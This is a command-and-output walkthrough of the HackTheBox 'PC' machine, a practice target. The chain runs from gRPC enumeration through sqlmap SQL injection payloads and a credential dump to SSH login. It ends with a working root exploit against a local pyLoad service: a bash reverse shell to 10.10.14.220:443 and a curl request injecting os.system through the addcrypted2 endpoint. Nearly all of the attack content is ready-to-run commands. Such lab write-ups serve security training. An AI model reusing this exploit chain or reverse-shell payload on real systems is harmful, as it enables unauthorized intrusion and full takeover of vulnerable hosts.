HackTheBox PC

Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 14:31 EDT
Nmap scan report for 10.10.11.214
Host is up (0.052s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
| ssh-hostkey: 
|   3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA)
|   256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA)
|_  256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519)
50051/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 143.21 seconds

$ nc 10.10.11.214 50051                                   
▒?��?�� ?

$ ./grpc_cli ls 10.10.11.214:50051
SimpleApp
grpc.reflection.v1alpha.ServerReflection
$ ./grpc_cli ls 10.10.11.214:50051 SimpleApp -l
filename: app.proto
service SimpleApp {
  rpc LoginUser(LoginUserRequest) returns (LoginUserResponse) {}
  rpc RegisterUser(RegisterUserRequest) returns (RegisterUserResponse) {}
  rpc getInfo(getInfoRequest) returns (getInfoResponse) {}
}
$ ./grpc_cli type 10.10.11.214:50051 LoginUserRequest
message LoginUserRequest {
  string username = 1;
  string password = 2;
}   
$ ./grpc_cli type 10.10.11.214:50051 RegisterUserRequest
message RegisterUserRequest {
  string username = 1;
  string password = 2;
}
$ ./grpc_cli type 10.10.11.214:50051 getInfoRequest     
message getInfoRequest {
  string id = 1;
}

$ ./grpc_cli call 10.10.11.214:50051 RegisterUser "username: 'user', password: 'user'"
connecting to 10.10.11.214:50051
message: "Account created for user user!"
Rpc succeeded with OK status
$ ./grpc_cli call 10.10.11.214:50051 LoginUser "username: 'user', password: 'user'"
connecting to 10.10.11.214:50051
message: "Your id is 767."
Received trailing metadata from server:
token : b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidXNlciIsImV4cCI6MTY4OTExMjA2Mn0.lTZieINh0j7CSujCGiIMM1EuQJY6ZcBXDlF7BqDNnyA'
Rpc succeeded with OK status

./grpc_cli call 10.10.11.214:50051 getInfo "id: '1'" -metadata "token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc" 
connecting to 10.10.11.214:50051
Sending client initial metadata:
token : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc
Rpc failed with status code 2, error message: Unexpected <class 'TypeError'>: 'NoneType' object is not subscriptabl
./grpc_cli call 10.10.11.214:50051 getInfo "id: '424'" -metadata "token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"
connecting to 10.10.11.214:50051
Sending client initial metadata:
token : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc
message: "Will update soon."
Rpc succeeded with OK status

./grpcui --plaintext 10.10.11.214:50051
token    b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc'

$ sqlmap -r getinfo.req -p data --risk 3
...
sqlmap identified the following injection point(s) with a total of 239 HTTP(s) requests:
---
Parameter: JSON #2* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"}],"data":[{"id":"-4808 OR 2579=2579"}]}

    Type: time-based blind
    Title: SQLite > 2.0 OR time-based blind (heavy query)
    Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"}],"data":[{"id":"424 OR 9114=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))"}]}

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"}],"data":[{"id":"424 UNION ALL SELECT CHAR(113,122,98,118,113)||CHAR(117,121,85,73,86,98,115,69,99,86,109,104,100,76,118,103,115,81,99,85,120,82,77,68,81,80,105,120,72,107,69,72,117,74,84,110,108,119,110,84)||CHAR(113,112,118,118,113)-- wLwQ"}]}
---
...

$ sqlmap -r getinfo.req -p data --risk 3 --dump-all
...
Table: accounts
[2 entries]
+------------------------+----------+
| password               | username |
+------------------------+----------+
| admin                  | admin    |
| HereIsYourPassWord1431 | sau      |
+------------------------+----------+
...
Table: messages
[1 entry]
+----+----------------------------------------------+----------+
| id | message                                      | username |
+----+----------------------------------------------+----------+
| 1  | The admin is working hard to fix the issues. | admin    |
+----+----------------------------------------------+----------+
...

$ ssh [email protected]                             
HereIsYourPassWord1431
-bash-5.0$ id
uid=1001(sau) gid=1001(sau) groups=1001(sau)

-bash-5.0$ ls -la
total 44
drwxr-xr-x 5 sau  sau  4096 Jul 11 17:31 .
drwxr-xr-x 3 root root 4096 Jan 11 18:10 ..
lrwxrwxrwx 1 root root    9 Jan 11 18:08 .bash_history -> /dev/null
-rw-r--r-- 1 sau  sau   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 sau  sau  3771 Feb 25  2020 .bashrc
drwx------ 2 sau  sau  4096 Jan 11 17:43 .cache
drwxrwxr-x 3 sau  sau  4096 Jul 11 11:23 .local
-rw-r--r-- 1 sau  sau   807 Feb 25  2020 .profile
drwx------ 2 sau  sau  4096 Jul 11 11:01 .ssh
-rw------- 1 sau  sau  1125 Jul 11 17:31 .viminfo
-rw-rw-r-- 1 sau  sau    55 Jul 11 14:25 bash.sh
-rw-r----- 1 root sau    33 Jul 11 10:42 user.txt
-bash-5.0$ cat user.txt 
ea0e2870b02b9c983ef9e371fb6e90e7

-bash-5.0$ netstat -tulpn | grep LISTEN
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:9666            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::50051                :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

$ ssh -L 127.0.0.1:8000:127.0.0.1:8000 [email protected]
HereIsYourPassWord1431

# на удаленной машине
$ nano /tmp/r.sh
bash -i >& /dev/tcp/10.10.14.220/443 0>&1
# на своей машине
$ nc -lnvp 443
$ curl -i -s -k -X #x27;POST' --data-binary #x27;jk=pyimport%20os;os.system(\"bash%20/tmp/r.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' #x27;http://127.0.0.1:8000/flash/addcrypted2'

root@pc:~# ls -la
total 68
drwx------  7 root root  4096 Apr 27 15:32 .
drwxr-xr-x 21 root root  4096 Apr 27 15:23 ..
lrwxrwxrwx  1 root root     9 Jan 11 17:36 .bash_history -> /dev/null
-rw-r--r--  1 root root  3106 Dec  5  2019 .bashrc
drwxr-xr-x  3 root root  4096 Apr  4 10:25 .cache
drwxr-xr-x  3 root root  4096 Apr  4 10:25 .local
-rw-r--r--  1 root root   161 Dec  5  2019 .profile
drwxr-xr-x  7 root root  4096 Jan 11 17:21 .pyload
-rw-------  1 root root  3203 Apr 27 15:32 .viminfo
drwxr-xr-x  3 root root  4096 Apr 27 13:15 Downloads
-rw-r-----  1 root root    33 Jul 11 10:42 root.txt
drwx------  3 root root  4096 Jan 11 16:56 snap
-rw-r--r--  1 root root 24576 Jan 11 17:57 sqlite.db.bak
root@pc:~# cat root.txt
f09c10a5010a1e5e4d2bed5a61c864de